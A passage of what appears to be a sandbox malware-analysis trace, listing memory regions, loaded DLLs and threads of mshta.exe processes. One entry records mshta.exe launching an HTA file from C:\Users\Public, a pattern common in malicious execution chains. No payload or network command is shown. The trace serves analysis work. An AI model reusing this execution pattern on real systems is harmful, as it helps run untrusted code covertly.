"c:\\windows\\syswow64\\mshta.exe") Region: id = 885 start_va = 0x2370000 end_va = 0x2370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 886 start_va = 0x2360000 end_va = 0x2367fff monitored = 0 entry_point = 0x2361900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe") Region: id = 887 start_va = 0x2370000 end_va = 0x2370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 888 start_va = 0x2360000 end_va = 0x2367fff monitored = 0 entry_point = 0x2361900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe") Region: id = 889 start_va = 0x2370000 end_va = 0x2370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 890 start_va = 0x2360000 end_va = 0x2361fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 891 start_va = 0x7ffc4e6d0000 end_va = 0x7ffc4e887fff monitored = 0 entry_point = 0x7ffc4e73e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 892 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 893 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 909 start_va = 0x2380000 end_va = 0x2387fff monitored = 0 entry_point = 0x2381900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe") Region: id = 910 start_va = 0x2840000 end_va = 0x2840fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 914 start_va = 0x7ffc4dc80000 end_va = 0x7ffc4dc8ffff monitored = 0 entry_point = 0x7ffc4dc83d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 915 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Thread: id = 23 os_tid = 0xd9c Thread: id = 24 os_tid = 0xb38 Thread: id = 25 os_tid = 0xd0c Thread: id = 26 os_tid = 0x924 Thread: id = 27 os_tid = 0xfc0 Thread: id = 28 os_tid = 0xd28 Thread: id = 29 os_tid = 0x4f0 Process: id = "4" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x207d0000" os_pid = "0xe14" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xe6c" cmd_line = "\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 894 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 895 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 896 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 897 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 898 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 899 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 900 start_va = 0xee0000 end_va = 0xee7fff monitored = 1 entry_point = 0xee1900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe") Region: id = 901 start_va = 0xef0000 end_va = 0x4eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 902 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 903 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 904 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 905 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 906 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 907 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 908 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 911 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 912 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 913 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 916 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 917 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 918 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 919 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 920 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 921 start_va = 0x4b0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 922 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 923 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 924 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 925 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 926 start_va = 0x4b0000 end_va = 0x56dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 927 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 928 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 929 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 930 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 931 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 932 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 933 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 934 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 935 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 936 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 937 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 938 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 939 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 940 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 941 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 942 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 943 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 944 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 945 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 946 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 947 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 948 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 949 start_va = 0x7e0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 950 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 951 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 952 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 953 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 954 start_va = 0x4ef0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ef0000" filename = "" Region: id = 955 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 956 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 957 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 958 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 959 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 960 start_va = 0x62f0000 end_va = 0x6626fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 961 start_va = 0x6b040000 end_va = 0x6b049fff monitored = 0 entry_point = 0x6b042420 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\SysWOW64\\wldp.dll" (normalized: "c:\\windows\\syswow64\\wldp.dll") Region: id = 962 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 963 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 964 start_va = 0x74240000 end_va = 0x74281fff monitored = 0 entry_point = 0x74256f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 965 start_va = 0x6d6d0000 end_va = 0x6ea51fff monitored = 1 entry_point = 0x6dab0ec0 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 966 start_va = 0xbf0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 967 start_va = 0x450000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 968 start_va = 0x703b0000 end_va = 0x7052dfff monitored = 0 entry_point = 0x7042c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 969 start_va = 0xcf0000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 970 start_va = 0xcf0000 end_va = 0xdeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 971 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 972 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 973 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 974 start_va = 0x7e0000 end_va = 0x870fff monitored = 0 entry_point = 0x818cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 975 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 976 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 977 start_va = 0x570000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 978 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 979 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 980 start_va = 0x7e0000 end_va = 0x89bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 981 start_va = 0x480000 end_va = 0x483fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 982 start_va = 0x6ea60000 end_va = 0x6ea7cfff monitored = 0 entry_point = 0x6ea63b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 983 start_va = 0x490000 end_va = 0x493fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 984 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 985 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 986 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 987 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 988 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 989 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 990 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 991 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 992 start_va = 0x8a0000 end_va = 0x8a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 993 start_va = 0x6eaf0000 end_va = 0x6ecfefff monitored = 0 entry_point = 0x6eb9b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 994 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 995 start_va = 0x8b0000 end_va = 0x8b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 996 start_va = 0xdf0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 997 start_va = 0xe30000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 998 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 999 start_va = 0x6630000 end_va = 0x667ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006630000" filename = "" Region: id = 1000 start_va = 0x6680000 end_va = 0x66bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 1001 start_va = 0x66c0000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066c0000" filename = "" Region: id = 1002 start_va = 0x6cda0000 end_va = 0x6cdbbfff monitored = 0 entry_point = 0x6cdb2a90 region_type = mapped_file name = "srpapi.dll" filename = "\\Windows\\SysWOW64\\srpapi.dll" (normalized: "c:\\windows\\syswow64\\srpapi.dll") Region: id = 1003 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1004 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1005 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1010 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1011 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1012 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1013 start_va = 0xe80000 end_va = 0xe83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1014 start_va = 0x6710000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 1015 start_va = 0x6750000 end_va = 0x684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 1016 start_va = 0x6c930000 end_va = 0x6c93dfff monitored = 0 entry_point = 0x6c933f60 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 1017 start_va = 0x6850000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 1018 start_va = 0x6890000 end_va = 0x698ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006890000" filename = "" Region: id = 1019 start_va = 0x6990000 end_va = 0x6990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006990000" filename = "" Region: id = 1020 start_va = 0x69a0000 end_va = 0x69dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069a0000" filename = "" Region: id = 1021 start_va = 0x69e0000 end_va = 0x6adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069e0000" filename = "" Region: id = 1022 start_va = 0x6ae0000 end_va = 0x6b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ae0000" filename = "" Region: id = 1023 start_va = 0x6b20000 end_va = 0x6c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b20000" filename = "" Region: id = 1024 start_va = 0x6c20000 end_va = 0x6c20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006c20000" filename = "" Region: id = 1025 start_va = 0x6c30000 end_va = 0x6c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006c30000" filename = "" Region: id = 1026 start_va = 0x6c30000 end_va = 0x6caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c30000" filename = "" Region: id = 1027 start_va = 0x65d40000 end_va = 0x65d93fff monitored = 0 entry_point = 0x65d5dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1028 start_va = 0x6cb0000 end_va = 0x6cb1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = 